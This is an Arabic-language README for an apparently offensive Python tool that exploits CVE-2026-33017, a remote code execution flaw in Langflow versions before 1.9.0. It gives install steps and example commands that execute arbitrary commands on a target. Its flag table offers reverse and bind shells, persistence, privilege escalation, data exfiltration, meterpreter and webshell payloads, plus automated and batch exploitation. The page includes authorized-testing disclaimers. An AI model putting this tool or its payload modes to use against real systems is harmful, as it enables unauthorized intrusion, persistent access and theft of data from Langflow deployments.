
أداة استغلال لـ CVE-2026-33017 في Langflow <1.9.0. تشمل قذائف عكسية، تنفيذ أوامر، عمليات ملفات، استمرارية، واختبارًا آليًا. تتحقق من تأثير ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) الحرجة. مخصصة لتقييمات الأمان المصرح بها فقط.
CVE-2026-33017 · اختبار أمني مصرح به لتنفيذ الأوامر عن بُعد في Langflow
أدوات بحث وفريق أحمر للتحقق من CVE-2026-33017 ضد حالات Langflow التي لديك إذن صريح بتقييمها. ليست للاستخدام غير المصرح به.
هذا المشروع مخصص فقط لـ:
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. أنت وحدك المسؤول عن الامتثال للقوانين المعمول بها والحصول على إذن كتابي قبل اختبار أي هدف. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.
إطار عمل Python غير متزامن لتقييم عمليات نشر Langflow التي قد تتأثر بـ CVE-2026-33017. يدعم فحوصات الثغرات الأمنية، واختيار وضع الحمولة، وتشغيل التقييم الآلي، وإعداد تقارير منظمة لتوثيق الاختبار.
--check-only غير المدمر--auto / موجّهة للدفعاتhttpx مع تسجيل قابل للتهيئةflow-id و client-id صالحان من Langflow لبيئة الاختبارgit clone https://github.com/CerberusMrXi/Langflow-cve-2026-33017-exploit
cd Langflow-cve-2026-33017-exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
--check-only
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "id"
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "uname -a" \
--report markdown \
--output-file report.md
python exploit.py -u URL -f FLOW_ID -c CLIENT_ID [options]
.
├── exploit.py # محرك التقييم وواجهة الأوامر الرئيسية
├── requirements.txt # تبعيات Python
├── README.md # هذا الملف
└── venv/ # بيئة افتراضية محلية (ليست للتحكم بالإصدارات)
إذا كان الهدف عرضة لـ CVE-2026-33017:
--check-only للتحقق من التصحيح--check-only قبل أي وضع حمولةالمساهمات التي تحسّن الموثوقية، أو التقارير، أو دقة الكشف، أو التوثيق الدفاعي مرحب بها. افتح issue أو pull request مع وصف واضح للتغيير وكيفية التحقق منه في بيئة مختبر.
مقدم لأغراض اختبار الأمان المصرح به والبحث التعليمي فقط.
لا يتم توفير أي ضمان. استخدمه على مسؤوليتك الخاصة وامتثالًا للقانون.
Sudeepa Wanigarathna
للبحث الأمني المصرح به · CVE-2026-33017
| البند | التفاصيل |
|---|
| CVE | CVE-2026-33017 |
| الهدف | Langflow |
| التخفيف المقترح | الترقية إلى Langflow ≥ 1.9.0 |
| اللغة | Python 3.10+ |
| الإصدار | 1.0.0 |
| المؤلف | Sudeepa Wanigarathna |
| Flag |
|---|
| الوصف |
|---|
-u, --url | عنوان URL الأساسي للهدف (مثل http://127.0.0.1:7860) |
-f, --flow-id | معرّف التدفق في Langflow |
-c, --client-id | قيمة ملف تعريف الارتباط Client ID |
| Flag | الوصف |
|---|
-t, --payload-type | reverse_shell, bind_shell, command_exec, file_read, file_upload, persistence, priv_esc, data_exfil, meterpreter, webshell, all (الافتراضي: reverse_shell) |
-l, --lhost | مضيف المستمع (يتم اكتشافه تلقائيًا عند حذفه حيثما أمكن) |
-p, --lport | منفذ المستمع (مطلوب لأوضاع shell / meterpreter) |
--cmd | سلسلة الأوامر (command_exec) |
--file-path | المسار لأوضاع قراءة/رفع الملفات |
--file-data | محتوى الرفع (file_upload) |
| Flag | الوصف |
|---|
--auto | سير عمل استغلال آلي |
--check-only | فحص الثغرات فقط |
--batch | وضع الدفعات |
--report | text | json | html | markdown |
--output-file | كتابة التقرير/الإخراج إلى ملف |
-v, --verbose | تسجيل مفصل |
-q, --quiet | الأخطاء فقط |